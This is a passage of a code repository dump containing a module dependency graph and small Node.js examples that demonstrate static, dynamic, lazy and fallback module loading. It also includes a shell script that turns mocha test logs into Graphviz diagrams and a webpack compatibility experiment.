    "./node_modules/diff/lib/diff/json.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/diff/array.js";
    "./node_modules/diff/lib/diff/array.js" -> "./node_modules/diff/lib/diff/base.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/apply.js";
    "./node_modules/diff/lib/patch/apply.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/patch/apply.js" -> "./node_modules/diff/lib/util/distance-iterator.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/merge.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/patch/create.js";
    "./node_modules/diff/lib/patch/create.js" -> "./node_modules/diff/lib/diff/line.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/patch/parse.js";
    "./node_modules/diff/lib/patch/merge.js" -> "./node_modules/diff/lib/util/array.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/patch/create.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/convert/dmp.js";
    "./node_modules/diff/lib/index.js" -> "./node_modules/diff/lib/convert/xml.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/debug/src/index.js" -> "./node_modules/debug/src/node.js";
    "./node_modules/debug/src/node.js" -> "./node_modules/debug/src/debug.js";
    "./node_modules/debug/src/debug.js" -> "./node_modules/ms/index.js";
    "./node_modules/debug/src/node.js" -> "./node_modules/supports-color/index.js";
    "./node_modules/supports-color/index.js" -> "./node_modules/has-flag/index.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/glob/glob.js";
    "./node_modules/glob/glob.js" -> "./node_modules/fs.realpath/index.js";
    "./node_modules/fs.realpath/index.js" -> "./node_modules/fs.realpath/old.js";
    "./node_modules/glob/glob.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/minimatch/minimatch.js" -> "./node_modules/brace-expansion/index.js";
    "./node_modules/brace-expansion/index.js" -> "./node_modules/concat-map/index.js";
    "./node_modules/brace-expansion/index.js" -> "./node_modules/balanced-match/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/inherits/inherits.js";
    "./node_modules/glob/glob.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/glob/sync.js";
    "./node_modules/glob/sync.js" -> "./node_modules/fs.realpath/index.js";
    "./node_modules/glob/sync.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/glob/sync.js" -> "./node_modules/glob/glob.js";
    "./node_modules/glob/sync.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/sync.js" -> "./node_modules/glob/common.js";
    "./node_modules/glob/common.js" -> "./node_modules/minimatch/minimatch.js";
    "./node_modules/glob/common.js" -> "./node_modules/path-is-absolute/index.js";
    "./node_modules/glob/glob.js" -> "./node_modules/glob/common.js";
    "./node_modules/glob/glob.js" -> "./node_modules/inflight/inflight.js";
    "./node_modules/inflight/inflight.js" -> "./node_modules/wrappy/wrappy.js";
    "./node_modules/inflight/inflight.js" -> "./node_modules/once/once.js";
    "./node_modules/once/once.js" -> "./node_modules/wrappy/wrappy.js";
    "./node_modules/glob/glob.js" -> "./node_modules/once/once.js";
    "./node_modules/mocha/lib/utils.js" -> "./node_modules/he/he.js";
    "./node_modules/mocha/lib/reporters/base.js" -> "./node_modules/supports-color/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/dot.js";
    "./node_modules/mocha/lib/reporters/dot.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/dot.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/doc.js";
    "./node_modules/mocha/lib/reporters/doc.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/doc.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/tap.js";
    "./node_modules/mocha/lib/reporters/tap.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/json.js";
    "./node_modules/mocha/lib/reporters/json.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/html.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/mocha/lib/browser/progress.js";
    "./node_modules/mocha/lib/reporters/html.js" -> "./node_modules/escape-string-regexp/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/list.js";
    "./node_modules/mocha/lib/reporters/list.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/list.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/min.js";
    "./node_modules/mocha/lib/reporters/min.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/min.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/spec.js";
    "./node_modules/mocha/lib/reporters/spec.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/spec.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/nyan.js";
    "./node_modules/mocha/lib/reporters/nyan.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/nyan.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/xunit.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/xunit.js" -> "./node_modules/mkdirp/index.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/markdown.js";
    "./node_modules/mocha/lib/reporters/markdown.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/markdown.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/progress.js";
    "./node_modules/mocha/lib/reporters/progress.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/progress.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/landing.js";
    "./node_modules/mocha/lib/reporters/landing.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/reporters/landing.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/reporters/index.js" -> "./node_modules/mocha/lib/reporters/json-stream.js";
    "./node_modules/mocha/lib/reporters/json-stream.js" -> "./node_modules/mocha/lib/reporters/base.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/interfaces/index.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/bdd.js";
    "./node_modules/mocha/lib/interfaces/bdd.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/test.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/pending.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/runnable.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/test.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/tdd.js";
    "./node_modules/mocha/lib/interfaces/tdd.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/qunit.js";
    "./node_modules/mocha/lib/interfaces/qunit.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/interfaces/index.js" -> "./node_modules/mocha/lib/interfaces/exports.js";
    "./node_modules/mocha/lib/interfaces/exports.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/hook.js";
    "./node_modules/mocha/lib/hook.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/hook.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/suite.js" -> "./node_modules/mocha/lib/ms.js";
    "./node_modules/mocha/lib/interfaces/exports.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/context.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/runner.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/pending.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/utils.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/debug/src/index.js";
    "./node_modules/mocha/lib/runner.js" -> "./node_modules/mocha/lib/runnable.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/hook.js";
    "./node_modules/mocha/lib/mocha.js" -> "./node_modules/mocha/lib/test.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/bin/options.js";
    "./node_modules/mocha/bin/_mocha" -> "./node_modules/mocha/lib/reporters/spec.js";
    "./node_modules/mocha/lib/interfaces/bdd.js" -> "./node_modules/mocha/lib/interfaces/common.js";
    "./node_modules/mocha/lib/interfaces/common.js" -> "./node_modules/mocha/lib/suite.js";
    "./node_modules/mocha/lib/mocha.js" -> "./test/test.js";
    "./test/test.js" -> "./node_modules/chai/index.js";
    "./node_modules/chai/index.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/assertion-error/index.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/utils/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/pathval/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/test.js";
    "./node_modules/chai/lib/chai/utils/test.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/expectTypes.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/assertion-error/index.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/expectTypes.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getMessage.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/getActual.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/get-func-name/index.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/utils/getProperties.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/utils/getEnumerableProperties.js";
    "./node_modules/chai/lib/chai/utils/inspect.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/getMessage.js" -> "./node_modules/chai/lib/chai/utils/objDisplay.js";
    "./node_modules/chai/lib/chai/utils/objDisplay.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/objDisplay.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getActual.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/objDisplay.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/deep-eql/index.js";
    "./node_modules/deep-eql/index.js" -> "./node_modules/type-detect/type-detect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/get-func-name/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addProperty.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/isProxyEnabled.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/addProperty.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addMethod.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/addLengthGuard.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/getProperties.js";
    "./node_modules/chai/lib/chai/utils/proxify.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/addMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteProperty.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/overwriteProperty.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteMethod.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/overwriteMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addChainableMethod.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/flag.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/addChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js";
    "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js" -> "./node_modules/chai/lib/chai.js";
    "./node_modules/chai/lib/chai/utils/overwriteChainableMethod.js" -> "./node_modules/chai/lib/chai/utils/transferFlags.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/compareByInspect.js";
    "./node_modules/chai/lib/chai/utils/compareByInspect.js" -> "./node_modules/chai/lib/chai/utils/inspect.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerablePropertySymbols.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerableProperties.js";
    "./node_modules/chai/lib/chai/utils/getOwnEnumerableProperties.js" -> "./node_modules/chai/lib/chai/utils/getOwnEnumerablePropertySymbols.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/check-error/index.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/proxify.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/addLengthGuard.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/isProxyEnabled.js";
    "./node_modules/chai/lib/chai/utils/index.js" -> "./node_modules/chai/lib/chai/utils/isNaN.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/assertion.js";
    "./node_modules/chai/lib/chai/assertion.js" -> "./node_modules/chai/lib/chai/config.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/core/assertions.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/expect.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/should.js";
    "./node_modules/chai/lib/chai.js" -> "./node_modules/chai/lib/chai/interface/assert.js";
    "./test/test.js" -> "./index.js";
    "./index.js" -> "./lib/static.js";
    "./index.js" -> "./lib/dynamic.js";
    "./index.js" -> "./lib/opt2.js";
    "./index.js" -> "./lib/lazy.js";
    "./package.json" -> "./index.js";
    "./package.json" [fillcolor=black,fontcolor=white,style=filled];
}


================================================
FILE: chapter-2/example/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// index.js
// Example that tests various kinds of loads.

let staticLoad = require('./lib/static');
function dynamicLoad(f, x) {
  return f('./lib/' + x);
}
dynamicLoad(require, Math.random() < 2 ? 'dynamic' : 'bogus');
exports.lazyLoad = () => require('./lib/lazy');

// Fallback to alternatives
require(['./lib/opt1', './lib/opt2'].find(
    (name) => {
      try {
        require.resolve(name);
        return true;
      } catch (_) {
        return false;
      }
    }));


================================================
FILE: chapter-2/example/lib/dynamic.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/dynamic.js

exports.x = 'dynamic';


================================================
FILE: chapter-2/example/lib/lazy.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/lazy.js

exports.x = 'lazy';


================================================
FILE: chapter-2/example/lib/opt2.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/opt2.js

exports.x = 'opt2';


================================================
FILE: chapter-2/example/lib/static.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// lib/static.js

exports.x = 'static';


================================================
FILE: chapter-2/example/make_dep_graph.sh
================================================
#!/bin/bash

# Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

set -e

cd "$(dirname "$0")"

mkdir -p graphs
(
    echo 'digraph Modules {'

    # Run the tests and filter the logs for log entries from our
    # hacked Module._load.
    # Also relativize source file paths.
    NODE=/Users/msamuel/work/node/out/Release/node \
    PATH="/Users/msamuel/work/node/out/Release/:$PATH" \
    ./node_modules/.bin/mocha 2>&1 \
    | perl -ne 's/"$ENV{PWD}/"./g; if (s/^REQUIRE_LOG_DOT://) { print $_; } else { print STDERR $_; }'

    # Add an edge from package.json to the main module.
    echo '    "./package.json" -> "./index.js";'
    echo '    "./package.json" [fillcolor=black,fontcolor=white,style=filled];'
    echo '}'
) > graphs/full.dot

python -c '
import re
import sys

EDGE_RE = re.compile(r"""^ *(\"(?:[^\"\\]|\\.)*\") -> (\"(?:[^\"\\]|\\.)*\");$""")
GRAPH_END_RE = re.compile(r"^ *\}")

edges = {}
def add_edge(src, tgt):
  tgts = edges.get(src)
  if tgts is None:
    tgts = []
    edges[src] = tgts
  tgts.append(tgt)

for line in sys.stdin:
  edges_match = EDGE_RE.match(line)
  if edges_match is not None:
    add_edge(edges_match.group(1), edges_match.group(2))
    continue
  elif GRAPH_END_RE.match(line):
    reachable = set()
    def find_reachable(src):
      if src not in reachable:
        reachable.add(src)
        for tgt in edges.get(src, ()):
          find_reachable(tgt)
    find_reachable("\"./package.json\"")
    reachable = list(reachable)
    reachable.sort()
    for src in reachable:
      for tgt in edges.get(src, ()):
        print "    %s -> %s;" % (src, tgt)
  print line,
' < graphs/full.dot > graphs/filtered.dot

for graph in full filtered; do
    dot -Tsvg graphs/"$graph".dot > graphs/"$graph".svg
done

# Start walking from package.json


================================================
FILE: chapter-2/example/package.json
================================================
{
    "name": "dynamism-example",
    "private": true,
    "description": "Example code that shows dynamically walking the test graph",
    "main": "index.js",
    "scripts": {
        "test": "echo $NODE; ./node_modules/.bin/mocha"
    },
    "author": "Mike Samuel",
    "license": "Apache-2.0",
    "devDependencies": {
        "chai": ">=4.1.2",
        "mocha": ">=4.0.1"
    }
}


================================================
FILE: chapter-2/example/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

// test/test.js

var expect = require("chai").expect;
var app = require("../index");

describe("My TestSuite", () => {
  describe("A test", () => {
    it("A unittest", () => {
      // Exercise the API
      app.lazyLoad();
    });
  });
});


================================================
FILE: chapter-2/experiments/webpack-compat/.gitignore
================================================
dist
node_modules

================================================
FILE: chapter-2/experiments/webpack-compat/goodbye.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.say = x => console.log(`Goodbye, ${x}!`);


================================================
FILE: chapter-2/experiments/webpack-compat/hello.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

exports.say = x => console.log(`Hello, ${x}!`);


================================================
FILE: chapter-2/experiments/webpack-compat/index.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

var metadata = require('./package.json');
var greeting = require('./' + metadata.greeting);

greeting.say('World');


================================================
FILE: chapter-2/experiments/webpack-compat/package.json
================================================
{
  "name": "webpack-compat-experiment",
  "description": "Figuring out how well webpack deals with dynamic loads",
  "version": "0.0.0",
  "main": "index.js",
  "dependencies": {},
  "scripts": {},
  "author": "Mike Samuel",
  "license": "Apache-2.0",
  "greeting": "hello",
  "devDependencies": {
    "webpack": "^3.10.0"
  }
}


================================================
FILE: chapter-2/experiments/webpack-compat/test/test.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     https://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */

console.log('test/test.js: NOT PRODUCTION CODE');


================================================
FILE: chapter-2/experiments/webpack-compat/test-utils.js
================================================
/**
 * @license
 * Copyright 2017 Google LLC
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
